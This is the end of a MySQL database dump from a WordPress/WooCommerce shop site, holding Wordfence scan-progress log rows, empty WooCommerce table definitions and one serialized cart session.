per second'),(13185,1704985332.564918,2,'info','Scanned contents of 15 additional files at 14.04 per second'),(13184,1704985331.493839,2,'info','Starting scan of file contents'),(13183,1704985330.658187,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(13182,1704985330.655068,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(13181,1704985330.645284,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(13180,1704985330.250349,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(13179,1704985330.229944,10,'info','SUM_ENDOK:Scanning for known malware files'),(13178,1704985330.221789,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(13177,1704985330.214097,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(13176,1704985330.213452,2,'info','Analyzed 16429 files containing 203.48 MB of data.'),(13175,1704985329.502401,2,'info','Analyzed 16400 files containing 203.14 MB of data so far'),(13174,1704985329.213061,2,'info','Analyzed 16300 files containing 201.38 MB of data so far'),(13173,1704985328.933672,2,'info','Analyzed 16200 files containing 200.06 MB of data so far'),(13172,1704985328.502549,2,'info','Analyzed 16100 files containing 195.4 MB of data so far'),(13171,1704985328.150248,2,'info','Analyzed 16000 files containing 193.97 MB of data so far'),(13170,1704985327.720247,2,'info','Analyzed 15900 files containing 191.96 MB of data so far'),(13169,1704985327.204993,2,'info','Analyzed 15800 files containing 187.93 MB of data so far'),(13168,1704985326.392173,2,'info','Analyzed 15700 files containing 171.54 MB of data so far'),(13167,1704985326.047004,2,'info','Analyzed 15600 files containing 169.93 MB of data so far'),(13166,1704985325.708564,2,'info','Analyzed 15500 files containing 167.93 MB of data so far'),(13165,1704985325.325149,2,'info','Analyzed 15400 files containing 165.36 MB of data so far'),(13164,1704985325.006100,2,'info','Analyzed 15300 files containing 163.24 MB of data so far'),(13163,1704985324.710988,2,'info','Analyzed 15200 files containing 161.74 MB of data so far'),(13162,1704985324.439160,2,'info','Analyzed 15100 files containing 161.52 MB of data so far'),(13161,1704985324.163357,2,'info','Analyzed 15000 files containing 161.43 MB of data so far'),(13160,1704985323.832709,2,'info','Analyzed 14900 files containing 161.3 MB of data so far'),(13159,1704985323.533501,2,'info','Analyzed 14800 files containing 160.95 MB of data so far'),(13158,1704985323.270691,2,'info','Analyzed 14700 files containing 160.68 MB of data so far'),(13157,1704985322.984177,2,'info','Analyzed 14600 files containing 160.57 MB of data so far'),(13156,1704985322.698698,2,'info','Analyzed 14500 files containing 159.91 MB of data so far'),(13155,1704985322.404208,2,'info','Analyzed 14400 files containing 159.14 MB of data so far'),(13154,1704985321.983928,2,'info','Analyzed 14300 files containing 157.36 MB of data so far'),(13153,1704985321.587686,2,'info','Analyzed 14200 files containing 156.48 MB of data so far'),(13152,1704985321.148174,2,'info','Analyzed 14100 files containing 153.65 MB of data so far'),(13151,1704985320.828529,2,'info','Analyzed 14000 files containing 152.34 MB of data so far'),(13150,1704985320.503130,2,'info','Analyzed 13900 files containing 151.2 MB of data so far'),(13149,1704985320.140238,2,'info','Analyzed 13800 files containing 149.39 MB of data so far'),(13148,1704985319.866409,2,'info','Analyzed 13700 files containing 146.81 MB of data so far'),(13147,1704985319.380463,2,'info','Analyzed 13600 files containing 139.27 MB of data so far'),(13146,1704985319.035422,2,'info','Analyzed 13500 files containing 137.22 MB of data so far'),(13145,1704985318.684411,2,'info','Analyzed 13400 files containing 134.75 MB of data so far'),(13144,1704985318.297899,2,'info','Analyzed 13300 files containing 131.67 MB of data so far'),(13143,1704985317.944756,2,'info','Analyzed 13200 files containing 129.63 MB of data so far'),(13142,1704985317.573357,2,'info','Analyzed 13100 files containing 127.7 MB of data so far'),(13141,1704985317.330863,2,'info','Analyzed 13000 files containing 127 MB of data so far'),(13140,1704985317.106783,2,'info','Analyzed 12900 files containing 126.72 MB of data so far'),(13139,1704985316.887826,2,'info','Analyzed 12800 files containing 126.31 MB of data so far'),(13138,1704985316.637037,2,'info','Analyzed 12700 files containing 125.42 MB of data so far'),(13137,1704985316.270695,2,'info','Analyzed 12600 files containing 122.11 MB of data so far'),(13136,1704985315.956635,2,'info','Analyzed 12500 files containing 121.74 MB of data so far'),(13135,1704985315.675421,2,'info','Analyzed 12400 files containing 120.4 MB of data so far'),(13134,1704985315.397977,2,'info','Analyzed 12300 files containing 119.33 MB of data so far'),(13133,1704985315.041118,2,'info','Analyzed 12200 files containing 117.08 MB of data so far'),(13132,1704985314.523624,2,'info','Analyzed 12100 files containing 109.75 MB of data so far'),(13131,1704985314.142424,2,'info','Analyzed 12000 files containing 107.79 MB of data so far'),(13130,1704985313.842020,2,'info','Analyzed 11900 files containing 107.35 MB of data so far'),(13129,1704985313.505777,2,'info','Analyzed 11800 files containing 106.97 MB of data so far'),(13128,1704985313.243795,2,'info','Analyzed 11700 files containing 106.65 MB of data so far'),(13127,1704985312.894542,2,'info','Analyzed 11600 files containing 105.68 MB of data so far'),(13126,1704985312.600518,2,'info','Analyzed 11500 files containing 105.42 MB of data so far'),(13125,1704985312.319358,2,'info','Analyzed 11400 files containing 105.05 MB of data so far'),(13124,1704985311.986873,2,'info','Analyzed 11300 files containing 104.31 MB of data so far'),(13123,1704985311.667929,2,'info','Analyzed 11200 files containing 103.89 MB of data so far'),(13122,1704985311.367288,2,'info','Analyzed 11100 files containing 103.45 MB of data so far'),(13121,1704985311.015948,2,'info','Analyzed 11000 files containing 102.72 MB of data so far'),(13120,1704985310.664564,2,'info','Analyzed 10900 files containing 102.17 MB of data so far'),(13119,1704985310.278495,2,'info','Analyzed 10800 files containing 101.98 MB of data so far'),(13118,1704985309.839598,2,'info','Analyzed 10700 files containing 101.47 MB of data so far'),(13117,1704985309.524312,2,'info','Analyzed 10600 files containing 101.12 MB of data so far'),(13116,1704985309.151766,2,'info','Analyzed 10500 files containing 100.58 MB of data so far'),(13115,1704985308.769551,2,'info','Analyzed 10400 files containing 100.32 MB of data so far'),(13114,1704985305.880190,2,'info','Analyzed 10300 files containing 92.76 MB of data so far'),(13113,1704985305.468401,2,'info','Analyzed 10200 files containing 91.3 MB of data so far'),(13112,1704985305.166954,2,'info','Analyzed 10100 files containing 90.96 MB of data so far'),(13111,1704985304.803978,2,'info','Analyzed 10000 files containing 90.22 MB of data so far'),(13110,1704985304.519576,2,'info','Analyzed 9900 files containing 89.83 MB of data so far'),(13109,1704985304.146026,2,'info','Analyzed 9800 files containing 88.63 MB of data so far'),(13108,1704985303.793534,2,'info','Analyzed 9700 files containing 87.76 MB of data so far'),(13107,1704985303.538738,2,'info','Analyzed 9600 files containing 87.56 MB of data so far'),(13106,1704985303.127538,2,'info','Analyzed 9500 files containing 87.18 MB of data so far'),(12990,1704985271.857173,2,'info','6000 files indexed'),(12988,1704985271.034272,2,'info','5000 files indexed'),(12989,1704985271.443570,2,'info','5500 files indexed'),(12987,1704985270.813964,2,'info','4500 files indexed'),(12986,1704985270.725281,2,'info','4000 files indexed'),(12980,1704985269.703586,2,'info','1000 files indexed'),(12981,1704985270.037251,2,'info','1500 files indexed'),(12982,1704985270.141175,2,'info','2000 files indexed'),(12983,1704985270.243594,2,'info','2500 files indexed'),(12984,1704985270.307366,2,'info','3000 files indexed'),(12985,1704985270.426373,2,'info','3500 files indexed'),(12979,1704985269.562009,2,'info','500 files indexed'),(12978,1704985269.400863,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(12976,1704985269.391643,10,'info','SUM_DISABLED:Skipping plugin scan'),(12977,1704985269.394715,10,'info','SUM_START:Scanning for known malware files'),(12975,1704985269.390316,10,'info','SUM_DISABLED:Skipping theme scan'),(12974,1704985269.385905,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(12973,1704985269.379745,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(12971,1704985269.367468,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(12972,1704985269.373904,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(12967,1704985268.155502,2,'info','Found 9 themes'),(12968,1704985268.167929,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(12969,1704985269.356984,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(12970,1704985269.362860,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(12966,1704985268.127272,2,'info','Getting theme list from WordPress'); /*!40000 ALTER TABLE `wpvt_wfstatus` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wftrafficrates` -- DROP TABLE IF EXISTS `wpvt_wftrafficrates`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wftrafficrates` ( `eMin` int(10) unsigned NOT NULL, `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `hitType` enum('hit','404') NOT NULL DEFAULT 'hit', `hits` int(10) unsigned NOT NULL, PRIMARY KEY (`eMin`,`IP`,`hitType`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wftrafficrates` -- LOCK TABLES `wpvt_wftrafficrates` WRITE; /*!40000 ALTER TABLE `wpvt_wftrafficrates` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wftrafficrates` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfwaffailures` -- DROP TABLE IF EXISTS `wpvt_wfwaffailures`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfwaffailures` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `throwable` text NOT NULL, `rule_id` int(10) unsigned DEFAULT NULL, `timestamp` timestamp NOT NULL DEFAULT current_timestamp(), PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfwaffailures` -- LOCK TABLES `wpvt_wfwaffailures` WRITE; /*!40000 ALTER TABLE `wpvt_wfwaffailures` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wfwaffailures` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_api_keys` -- DROP TABLE IF EXISTS `wpvt_woocommerce_api_keys`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_api_keys` ( `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_id` bigint(20) unsigned NOT NULL, `description` varchar(200) DEFAULT NULL, `permissions` varchar(10) NOT NULL, `consumer_key` char(64) NOT NULL, `consumer_secret` char(43) NOT NULL, `nonces` longtext DEFAULT NULL, `truncated_key` char(7) NOT NULL, `last_access` datetime DEFAULT NULL, PRIMARY KEY (`key_id`), KEY `consumer_key` (`consumer_key`), KEY `consumer_secret` (`consumer_secret`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_api_keys` -- LOCK TABLES `wpvt_woocommerce_api_keys` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_api_keys` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_api_keys` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_attribute_taxonomies` -- DROP TABLE IF EXISTS `wpvt_woocommerce_attribute_taxonomies`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_attribute_taxonomies` ( `attribute_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `attribute_name` varchar(200) NOT NULL, `attribute_label` varchar(200) DEFAULT NULL, `attribute_type` varchar(20) NOT NULL, `attribute_orderby` varchar(20) NOT NULL, `attribute_public` int(1) NOT NULL DEFAULT 1, PRIMARY KEY (`attribute_id`), KEY `attribute_name` (`attribute_name`(20)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_attribute_taxonomies` -- LOCK TABLES `wpvt_woocommerce_attribute_taxonomies` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_attribute_taxonomies` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_attribute_taxonomies` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_downloadable_product_permissions` -- DROP TABLE IF EXISTS `wpvt_woocommerce_downloadable_product_permissions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_downloadable_product_permissions` ( `permission_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `download_id` varchar(36) NOT NULL, `product_id` bigint(20) unsigned NOT NULL, `order_id` bigint(20) unsigned NOT NULL DEFAULT 0, `order_key` varchar(200) NOT NULL, `user_email` varchar(200) NOT NULL, `user_id` bigint(20) unsigned DEFAULT NULL, `downloads_remaining` varchar(9) DEFAULT NULL, `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `access_expires` datetime DEFAULT NULL, `download_count` bigint(20) unsigned NOT NULL DEFAULT 0, PRIMARY KEY (`permission_id`), KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(16),`download_id`), KEY `download_order_product` (`download_id`,`order_id`,`product_id`), KEY `order_id` (`order_id`), KEY `user_order_remaining_expires` (`user_id`,`order_id`,`downloads_remaining`,`access_expires`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_downloadable_product_permissions` -- LOCK TABLES `wpvt_woocommerce_downloadable_product_permissions` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_downloadable_product_permissions` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_downloadable_product_permissions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_log` -- DROP TABLE IF EXISTS `wpvt_woocommerce_log`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_log` ( `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `timestamp` datetime NOT NULL, `level` smallint(4) NOT NULL, `source` varchar(200) NOT NULL, `message` longtext NOT NULL, `context` longtext DEFAULT NULL, PRIMARY KEY (`log_id`), KEY `level` (`level`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_log` -- LOCK TABLES `wpvt_woocommerce_log` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_log` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_log` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_order_itemmeta` -- DROP TABLE IF EXISTS `wpvt_woocommerce_order_itemmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_order_itemmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `order_item_id` bigint(20) unsigned NOT NULL, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`meta_id`), KEY `order_item_id` (`order_item_id`), KEY `meta_key` (`meta_key`(32)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_order_itemmeta` -- LOCK TABLES `wpvt_woocommerce_order_itemmeta` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_order_itemmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_order_itemmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_order_items` -- DROP TABLE IF EXISTS `wpvt_woocommerce_order_items`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_order_items` ( `order_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `order_item_name` text NOT NULL, `order_item_type` varchar(200) NOT NULL DEFAULT '', `order_id` bigint(20) unsigned NOT NULL, PRIMARY KEY (`order_item_id`), KEY `order_id` (`order_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_order_items` -- LOCK TABLES `wpvt_woocommerce_order_items` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_order_items` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_order_items` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_payment_tokenmeta` -- DROP TABLE IF EXISTS `wpvt_woocommerce_payment_tokenmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_payment_tokenmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `payment_token_id` bigint(20) unsigned NOT NULL, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`meta_id`), KEY `payment_token_id` (`payment_token_id`), KEY `meta_key` (`meta_key`(32)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_payment_tokenmeta` -- LOCK TABLES `wpvt_woocommerce_payment_tokenmeta` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_payment_tokenmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_payment_tokenmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_payment_tokens` -- DROP TABLE IF EXISTS `wpvt_woocommerce_payment_tokens`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_payment_tokens` ( `token_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `gateway_id` varchar(200) NOT NULL, `token` text NOT NULL, `user_id` bigint(20) unsigned NOT NULL DEFAULT 0, `type` varchar(200) NOT NULL, `is_default` tinyint(1) NOT NULL DEFAULT 0, PRIMARY KEY (`token_id`), KEY `user_id` (`user_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_payment_tokens` -- LOCK TABLES `wpvt_woocommerce_payment_tokens` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_payment_tokens` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_payment_tokens` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_sessions` -- DROP TABLE IF EXISTS `wpvt_woocommerce_sessions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_sessions` ( `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `session_key` char(32) NOT NULL, `session_value` longtext NOT NULL, `session_expiry` bigint(20) unsigned NOT NULL, PRIMARY KEY (`session_id`), UNIQUE KEY `session_key` (`session_key`) ) ENGINE=MyISAM AUTO_INCREMENT=1987 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_sessions` -- LOCK TABLES `wpvt_woocommerce_sessions` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_sessions` DISABLE KEYS */; INSERT INTO `wpvt_woocommerce_sessions` (`session_id`, `session_key`, `session_value`, `session_expiry`) VALUES (1986,'1','a:7:{s:4:\"cart\";s:6:\"a:0:{}\";s:11:\"cart_totals\";s:367:\"a:15:{s:8:\"subtotal\";i:0;s:12:\"subtotal_tax\";i:0;s:14:\"shipping_total\";i:0;s:12:\"shipping_tax\";i:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";i:0;s:12:\"discount_tax\";i:0;s:19:\"cart_contents_total\";i:0;s:17:\"cart_contents_tax\";i:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";i:0;s:7:\"fee_tax\";i:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";i:0;s:9:\"total_tax\";i:0;}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:22:\"coupon_discount_totals\";s:6:\"a:0:{}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:8:\"customer\";s:741:\"a:26:{s:2:\"id\";s:1:\"1\";s:13:\"date_modified\";s:25:\"2023-08-22T09:55:55+00:00\";s:8:\"postcode\";s:0:\"\";s:4:\"city\";s:0:\"\";s:9:\"address_1\";s:0:\"\";s:7:\"address\";s:0:\"\";s:9:\"address_2\";s:0:\"\";s:5:\"state\";s:0:\"\";s:7:\"country\";s:2:\"GB\";s:17:\"shipping_postcode\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:0:\"\";s:16:\"shipping_country\";s:2:\"GB\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:7:\"company\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:5:\"email\";s:27:\"admin@tummyrevolution.co.uk\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";}\";}',1692870956); /*!40000 ALTER TABLE `wpvt_woocommerce_sessions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_shipping_zone_locations` -- DROP TABLE IF EXISTS `wpvt_woocommerce_shipping_zone_locations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_shipping_zone_locations` ( `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `zone_id` bigint(20) unsigned NOT NULL, `location_code` varchar(200) NOT NULL, `location_type` varchar(40) NOT NULL, PRIMARY KEY (`location_id`), KEY `location_id` (`location_id`), KEY `location_type_code` (`location_type`(10),`location_code`(20)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_shipping_zone_locations` -- LOCK TABLES `wpvt_woocommerce_shipping_zone_locations` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_shipping_zone_locations` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_shipping_zone_locations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_shipping_zone_methods` -- DROP TABLE IF EXISTS `wpvt_woocommerce_shipping_zone_methods`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_shipping_zone_methods` ( `zone_id` bigint(20) unsigned NOT NULL, `instance_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `method_id` varchar(200) NOT NULL, `method_order` bigint(20) unsigned NOT NULL, `is_enabled` tinyint(1) NOT NULL DEFAULT 1, PRIMARY KEY (`instance_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_shipping_zone_methods` -- LOCK TABLES `wpvt_woocommerce_shipping_zone_methods` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_shipping_zone_methods` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_shipping_zone_methods` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_shipping_zones` -- DROP TABLE IF EXISTS `wpvt_woocommerce_shipping_zones`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_shipping_zones` ( `zone_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `zone_name` varchar(200) NOT NULL, `zone_order` bigint(20) unsigned NOT NULL, PRIMARY KEY (`zone_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_shipping_zones` -- LOCK TABLES `wpvt_woocommerce_shipping_zones` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_shipping_zones` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_shipping_zones` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_tax_rate_locations` -- DROP TABLE IF EXISTS `wpvt_woocommerce_tax_rate_locations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_tax_rate_locations` ( `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `location_code` varchar(200) NOT NULL, `tax_rate_id` bigint(20) unsigned NOT NULL, `location_type` varchar(40) NOT NULL, PRIMARY KEY (`location_id`), KEY `tax_rate_id` (`tax_rate_id`), KEY `location_type_code` (`location_type`(10),`location_code`(20)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_tax_rate_locations` -- LOCK TABLES `wpvt_woocommerce_tax_rate_locations` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_tax_rate_locations` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_tax_rate_locations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_woocommerce_tax_rates` -- DROP TABLE IF EXISTS `wpvt_woocommerce_tax_rates`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_woocommerce_tax_rates` ( `tax_rate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `tax_rate_country` varchar(2) NOT NULL DEFAULT '', `tax_rate_state` varchar(200) NOT NULL DEFAULT '', `tax_rate` varchar(8) NOT NULL DEFAULT '', `tax_rate_name` varchar(200) NOT NULL DEFAULT '', `tax_rate_priority` bigint(20) unsigned NOT NULL, `tax_rate_compound` int(1) NOT NULL DEFAULT 0, `tax_rate_shipping` int(1) NOT NULL DEFAULT 1, `tax_rate_order` bigint(20) unsigned NOT NULL, `tax_rate_class` varchar(200) NOT NULL DEFAULT '', PRIMARY KEY (`tax_rate_id`), KEY `tax_rate_country` (`tax_rate_country`), KEY `tax_rate_state` (`tax_rate_state`(2)), KEY `tax_rate_class` (`tax_rate_class`(10)), KEY `tax_rate_priority` (`tax_rate_priority`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_woocommerce_tax_rates` -- LOCK TABLES `wpvt_woocommerce_tax_rates` WRITE; /*!40000 ALTER TABLE `wpvt_woocommerce_tax_rates` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_woocommerce_tax_rates` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'tummmyov_wp40' -- -- -- Dumping routines for database 'tummmyov_wp40' -- /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2024-04-15 3:38:15